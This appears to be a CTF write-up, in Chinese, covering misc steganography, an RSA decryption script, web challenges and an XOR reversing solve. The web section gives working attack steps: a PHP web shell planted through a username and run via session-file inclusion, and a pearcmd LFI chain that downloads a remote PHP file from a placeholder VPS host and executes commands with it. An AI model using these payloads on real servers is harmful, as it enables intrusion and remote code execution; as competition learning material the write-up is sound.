Misc
好玩的编码
happyImg
再red和blue发现有隐藏信息,再green有一个密码
隐藏信息为压缩包格式,导出压缩包,解压密码为!QAZXSW@1qazxsw2
网络追踪
+774
Crypto
3DES
HAPPYRSA
# from Crypto.Util.number import bytes_to_long
# from flag import flag
p = 97559992143538505823351615639211763734311559951587665014345919747733390740450790273359386575890798160795025626573580365828156108078100621074495137190416226109270591884516099679926053478560750986193065549865131400457769381398338702594631516054868885157801055786648957386508374821243393633398068286519087291899
e = 223
q = 305441694023646712448997551501420161654473174790323208128426716523786159389593732096324499033892465876683490515456465981922248571768795221792067055550876465089846480000103207743072486330333647531692833975457277965585913100536970416049033758578728704151353769882703817603346904165274693820583811661679269246933
n = p * q
# assert(flag.startswith('flag'))
# m = bytes_to_long(flag.encode())
# c = pow(m, e, n)
# print(c)
c = 8310151988085860771226135398874764307621316769660563267495107758782855420167201345224621932233009864886459191650276831555553606018772356624861344010051427084784712615419584399034171295434663517111130692609510225248850800086750351336299722121740091690781297611587292792380263994661373171593543809045588215109967008287273462651359353786188222933360961215432623197670015133463997036747979075992284955864774118038735419327630590319728196257908297742808557311174379279085833900573941668601788656519597930019583786869324790276024107739682158108450127890693464079075924933789639419538796893294354565682012619667240947317948
import random
import math
from Crypto.Util.number import *
def GF(a):
global p
p = a
def g(a, b):
global p
return pow(a, b, p)
def AMM(x, e, p):
GF(p)
y = random.randint(1, p - 1)
while g(y, (p - 1) // e) == 1:
y = random.randint(1, p - 1)
print(y)
t = 1
s = 0
while p % e == 0:
t += 1
print(t)
s = p // (e ** t)
k = 1
while ((s * k + 1) % e != 0):
k += 1
alpha = (s * k + 1) // e
a = g(y, (e ** (t - 1)) * s)
b = g(x, e * alpha - 1)
c = g(y, s)
h = 1
for i in range(1, t - 1):
d = g(b, e ** (t - 1 - i))
if d == 1:
j = 0
else:
j = -math.log(d, a)
b = b * (g(g(c, e), j))
h = h * g(c, j)
c = g(c, e)
root = (g(x, alpha * h)) % p
roots = set()
for i in range(e):
mp2 = root * g(a, i) % p
roots.add(mp2)
return roots
def check(m):
if 'flag' in m:
print(m)
return True
else:
return False
mps = AMM(c, e, q)
for mpp in mps:
flag = str(long_to_bytes(mpp))
if check(flag):
print(flag)
Web
Web1
LZAS46MXDWvzVF1uDD61KMu3PBBYfQkK<font color="red"><h1>f</h1></font>NEHCkNwzFniTV9atD84Et8yDahvOcmhU
2aBmuGdlU4EFud68bNS90NVduB7qt81l<font color="red"><h1>l</h1></font>fDLwVypO109Ow1OeKYFkE1KlBt3M5zev
Lxy8LrMIbcZa7loZM08E7TPQYHyoP2KW<font color="red"><h1>a</h1></font>qYnGbVauit5bzoJ21xZRyKKsCvc9XEIx
SbvEaj4cj3bZ0mwSW0frvrJ5gWEmXqJ9<font color="red"><h1>g</h1></font>HiCalmJXU3hYCKrxkINwuIWrEQIO6znc
Cho2U1whqZVbmpWPqCTi0M6uXKTgeYz7<font color="red"><h1>{</h1></font>rdFjzGNrONdSTID0CA5dh9a8eIRI4osT
PUhn248i8WHE7ndNDOYfaJqOdog4YhaZ<font color="red"><h1>1</h1></font>t2Uq5xh6dv2jopjQboI86Wd8FKPxvmJi
di4xlyVVWu8jCqspZH2606aMOpsSEQbP<font color="red"><h1>5</h1></font>yPEZrOI1I4fL4tMPOk4FeZfak2PhLrGc
6kkxvURaRiRGvg8YUDDERi1SHDXTtZYh<font color="red"><h1>8</h1></font>Lzmp24EVDdJ6eXneSC1GXcbbiuD0bB45
tvnIR8wOScnJ0Q2cqNb2Aljf444LnqhY<font color="red"><h1>0</h1></font>RlL84YxMqZHaOenkQl4BW1ZgsdgRBdZg
ckDQggrNzb8z9PECsdOPJd8gM7pD9XiP<font color="red"><h1>8</h1></font>dwMu0A4KCpvMW1Xrt6eWpeMZF4Nk1DCm
tRmvQYVOzffP6fIIXQoM7Bj0P35jCD5y<font color="red"><h1>2</h1></font>nrQHN7YYTGAYJfKyXwgiTJ4vhcO3nfcR
2eGTHR079XGkf0aVQrvQlDakOCsMSS6o<font color="red"><h1>b</h1></font>dk3wLwlOQg1eUxaDIrPJn4Mn7SFbIBWV
FK4mPmYJYq0hYuIg4h6uVVU7oaBoQiFS<font color="red"><h1>6</h1></font>tgiojNAE6BmbzpsWGHb8gWolvTrsUCHD
T1mZ8kYzjkgMbcTSSO75OqRVlOIRuL1N<font color="red"><h1>b</h1></font>8IIePLC52QBrpksgPBWcrkr0TVh1CTBP
FVf2zgy9huHNNfKfR0riVvUcKVAV3Psf<font color="red"><h1>4</h1></font>DWTrEtSfymiuIgunyjmQlxxa89FD5H1A
PrN6uMBaE5KRqvjRdmL7Gw2TzY4YfJVe<font color="red"><h1>c</h1></font>69QszdRFGjwbHO7sqFE7S1FDVuKMY7vu
lt6erK9YZu7ezxBGsrHq95L4ROjmkf1d<font color="red"><h1>a</h1></font>Fb5ekEy4olIwzeHcF9Ir4jlTAK0meX7V
sDpwprVyqeFTGa93rwCsWZKzJh3gbn1q<font color="red"><h1>e</h1></font>DrPYOvsMK3pIQ1Lb9ZoahCQJkBzSZfKO
gM4YngtMoY1mkP3VjHOYu6TSefQxHuXZ<font color="red"><h1>6</h1></font>By6q9xCv02nvszBNJh7N0Lz2ZucJQh24
zvB9n68nAwRmpi4MMlqiJuyQ2qVxt93G<font color="red"><h1>f</h1></font>ofgr7xjXkxbVSqOAr03gXkUD4E3PXUmm
p8nF01qVLoy36rggd1lzkifbXdSqsEEz<font color="red"><h1>1</h1></font>jdVXJ914oHl78ajDZjucnwo9H7ya39oR
4A50pq656g3oEjGskdggYwhHE1tAnhYN<font color="red"><h1>f</h1></font>R0d4CAuh4MT9FQRFxDPs8Oq7CGpzhKQC
ujuzqI9GVieeLIH5OuMEY2p9SZ5MqG0f<font color="red"><h1>6</h1></font>UBh3JcVJ7DY9x8qdegcLyqCIDWxb0vG8
aIcSPRqkawYX6zF9pVjDHVnbrJwwz5AW<font color="red"><h1>7</h1></font>5M2rUXMu4yIWuPU9W0J0PQAfqPtwvLUY
beBtbIkiKOEl9IiC6JC97JWfhiBhjwxo<font color="red"><h1>9</h1></font>rTqNyzLpuYylQoKNr1HtZ6aMDDKmzj0A
mcSuvgDlHkXarL1LVjK4Nr6rtbT8HAmI<font color="red"><h1>f</h1></font>oxHfqDKq4loWxFBDvlPwK7rD4tChjtRx
jOKyVeCgDA7deB2WPyeU7VmKIfDCU0Xd<font color="red"><h1>6</h1></font>xoiQW0SQZ9htnNzqJGILq0YzeylKHNmx
SRRbSUWLZfFIJCdjU45d09ul7kOnG3Lu<font color="red"><h1>7</h1></font>8TOORhaSp84r6e9Wt9Z456fz3mMmVfGw
6IHilO1RL0GH4wPTUHLMLwJKdFaOqZWq<font color="red"><h1>e</h1></font>sS0IdwIjl4pwUAMstuP68fyeCcc7mSJu
hS12vghYNz6Y0thbNAXERMneEB7u7CsA<font color="red"><h1>f</h1></font>ljX7SlFx0xR89aHfGgbFCwwTAoeUYAoB
ZSqdU4mYm09fjkXW3i7upzowyDLim8x3<font color="red"><h1>9</h1></font>lNlbeHhv3ah1PLilXaKAHBgkwEHGWtxG
zm21Gwws8dza5dB3fGjNJKlCiIAW5whm<font color="red"><h1>a</h1></font>7OmC6eTpToRCQa4r7xGHNf5uMcoOhbaK
TXSemjkauiXqr5ws0h9yGeeaWmbVf0f3<font color="red"><h1>6</h1></font>0RlwIiw4PCfzRRL46drk6X9uzsvHgtAV
ZzlXHtJDgA7eEXoCshORONuxqu5hIWUc<font color="red"><h1>e</h1></font>qz6fAUiDhlFxEGoRuJr6wCpzoIBTTxtM
yYcvSTb5qOXKfsZnpF6zTbdxreR6fKsC<font color="red"><h1>6</h1></font>fe7J441n59p4NGqWWO8PGeDZAPBf9l1Q
SEk2YPzE3vSBT78QPTL7H6A1IKbLuUN2<font color="red"><h1>b</h1></font>n4GnXcxjXethzYoBiZlRAZC1R6m4ho0N
f4cJDNmrY3WDtvpbuZ4QL5xeaaO6fIGb<font color="red"><h1>1</h1></font>eiQdgLPXK8r7CfvpLjKhIBjNhIeJUff0
hrSuM0lh3yMQwQ9bKQRhK6Y0JDS0HbmR<font color="red"><h1>}</h1></font>79y8ZcmbuGAbBKdEgZCLsz4fg1UVOMg6
lfi-system
然后尝试了文件包含包含到session文件,但是session不可控制 然后注册用户,在后台看到了profile文件,然后我们包含session看到了用户名字,
edit后发现没法更新,我们考虑注册个用户将username写进去 注册用户
<?php phpinfo();passthru($_POST['1']);?>
然后在后台edit下,在去包含session文件
POST /file.php?file=/var/lib/php/sessions/sess_cg4sb0095e1t1m763dou17v0a3
HTTP/1.1
Host: 47.105.39.3:22003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;
q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=cg4sb0095e1t1m763dou17v0a3
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
1=cat /flag-b082e9523a1afc68bcb0299e028a5560
onenav
看到版本文件然后github 在is看到漏洞问题
c这里直接include_once 没任何的过滤,而且拼接了.php
然后我们考虑使用pearcmd 去远程下载文件
http://47.105.39.3:21002/index.php?
c=../../../../../../usr/local/lib/php/pearcmd&+install+-
R+/var/www/html+http://vps/1.php
http://47.105.39.3:21002/tmp/pear/download/1.php?1=system(%27cat%20/flag*%27)
RE
GOGOGO
import base64
crtext = "HAkACxwLUV4KBB8DVQ4CWFFQDVYZBwIPVl5dA1wHQwdRVV5ZVRo="
flag = base64.b64decode(crtext)
print(len(flag))
v = 'zealgiegie'
for i in range(0,38):
#v9 = i - 10 * ((i + ((i * 0xCCCCCCCCCCCCCCCD)>>64))>>3)
print(chr(flag[i]^ord(v[i%len(v)])),end='')
